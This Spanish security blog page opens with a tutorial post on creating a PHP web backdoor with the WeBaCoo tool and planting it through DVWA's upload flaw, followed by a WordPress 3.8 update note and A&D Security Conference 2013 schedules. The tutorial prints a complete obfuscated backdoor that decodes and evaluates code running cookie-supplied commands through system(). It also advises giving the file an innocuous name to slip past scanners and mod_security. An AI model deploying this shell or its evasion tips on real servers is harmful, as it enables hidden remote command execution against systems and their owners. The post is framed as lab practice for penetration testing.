17 de diciembre de 2013
Como crear un Backdoor con WeBaCoo (2 de 2)
Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.
Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.
$ ./webacoo.pl -g -f 1 -o consulta.php
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }
[+] Backdoor file "consulta.php" created.
Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.
$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
Etiquetas:
Backdoor
,
Pentesting
,
PHP
16 de diciembre de 2013
Actualización WordPress 3.8
Por estos últimos días, se liberó una nueva actualización del CMS más popular de la web, WordPress 3.8 “Parker”, la misma incorpora todas las actualizaciones anteriores como la
Todas las mejoras para esta nueva versión son a nivel de experiencia de usuario y hasta el momento no se dio detalle sobre fallos de seguridad, es posible en el correr de los días se publiquen algunos documentos al respecto.
La verdad que estuve trabajando todo el fin de semana con esta nueva versión, donde le da un giro 360º al panel de administración, nuevos estilos, responsive designer, nueva administración de themes y varias cosas más que estoy seguro que van a percibir aquellos usuarios que vienen trabajando con WordPress.
Por otro lado #WPHardening es totalmente compatible con WordPress 3.8 así que les recomiendo implementarlo para cerrar y fortificar su proyecto antes de enviarlo a producción o subirlo al web hosting.
Desde ya es recomendable actualizar a esta nueva versión por posibles problemas de seguridad futuros y además para tener y disfrutar de esta nueva versión 100% libre.
Saludos!
Enlace | WordPress 3.8
Etiquetas:
Actualización
,
Noticia
,
WordPress
13 de diciembre de 2013
A&D Security Conference 2013 - Día 2 en Vivo
Live streaming video by Ustream
09:00 AM
Registración09:30 AM
Bienvenida09:40 AM
La Ética del Hacker Valentin Muro10:00 AM
Auditorio 1 - Conociendo Huemul distro para informatica Forense Marcos Russo/Vampii/Gonzalo ZaccardiAula 1 - OpenTalks
Aula 2 - OpenTalks
10:45 AM
Auditorio 1 - Pivoting in Amazon clouds Andres RianchoAula 1 - OpenTalks
Aula 2 - OpenTalks
11:30 AM
Break11:45 AM
Auditorio 1 - Uso de la Ingeniería Inversa de código en la detección de vulnerabilidades Eugenia BahitAula 1 - TULZ - w3af Andres Riancho
Aula 2 - TULZ - PC táctil Daniel Dieser
12:30 PM
Auditorio 1 - Brazilian cybercrime underground: Modus Operandi Ronaldo Lima/Aline BuenoAula 1 - TULZ - Secure TDD Carlos Pantelides
Aula 2 - TULZ - vScan Federico Massa
13:15 PM
Almuerzo14:30 PM
Auditorio 1 - Hacking RFID Babak JavadiAula 1 - OpenTalks
Aula 2 - OpenTalks
15:15 PM
Auditorio 1 - Temas avanzados de Rootkits Marcos SchejtmanAula 1 - OpenTalks
Aula 2 - OpenTalks
16:00 PM
Break16:15 PM
Hackers University: Out of The Matrix Fede Pacheco16:45 PM
Desde Dig a la Destrucción de RSA Cristian Amicelli17:45 PM
Cierre / Sorteos / Show18:30 PM
Fin Día 212 de diciembre de 2013
A&D Security Conference 2013 - Día 1 en Vivo
09:00 AM
Registración09:45 AM
Bienvenida10:00 AM
Los límites éticos y legales que no podés cruzar en una investigación, o sí Sebastian Bortnik10:30 AM
Hacking Router's with FeeeBSD Alexis Sarghel / Diego Gutierrez11:15 AM
Openpgp y HTTP: Alta fiesta? Buanzo12:00 AM
Break12:15 PM
Auditorio 1 - Workshop Fail2ban BuanzoAuditorio 2 - Workshop Cryptography 101 Paulo Veloso
13:15 PM
Almuerzo14:30 PM
Auditorio 1 - Workshop Lockpicking Babak JavadiAuditorio 2 - Workshop Your brain, my treasure... Michael Hudson
15:30 PM
Break15:45 PM
Life as a Cracker, mitos y verdades Alberto Ferrer / David de Asis16:30 PM
The CSO Myopia Jordan Bonagura17:15 PM
Facebook Hacking Tool Gustavo Ogawa18:15 PM
Cierre18:30 PM
Fin Día 1
Suscribirse a:
Entradas (Atom)
Entradas populares
-
Lamento que te enteres por este medio pero tu pareja te engaña. Hace tiempo estoy saliendo con alguien y me engaño diciendo que no tenia ...
-
El Análisis Forense de computadores y sistemas es una de la rama fascinantes de la seguridad informática que año tras año va tomando más fu...
-
En algún momento hablamos lo simple y práctico que es contactar con reportes reportes web, completos analizadores de Logs que nos permiten m...
-
La idea de este post es dejarle una lista de gente que realmente se dedica a Seguridad Informática y sus temas relacionados, gente apasio...
-
Hoy les quiero compartir un nuevo Webcast parte de la segunda temporada de ElevenPaths Talks . Para esta sesión nos encontramos con Diego Es...
-
Luego de un par de semanas de programacion y algunos commits en los repositorios de GitHub , les quería anunciar la version 1.0 de WPHarde...
-
Esto es parte de las nuevas tecnologías con la que hoy contamos. Solo basta con leer un par de líneas para saber de que estas ideas son las ...
-
Figura 1: 4 consejos para proteger SSH en RouterOS Hace algunos días publiqué un Dork en Google y en Shodan donde nos permite encontra...
-
Excelente investigación por parte de Sheila Berta ( @UnaPibaGeek ) sobre un mecanismo de vulnerar un Android y que dió nombre a su confere...
-
No quería dejar pasar esta oportunidad para celebrar junto a todos los lectores de este, mi pequeño espacio donde me gusta hablar ( escribir...
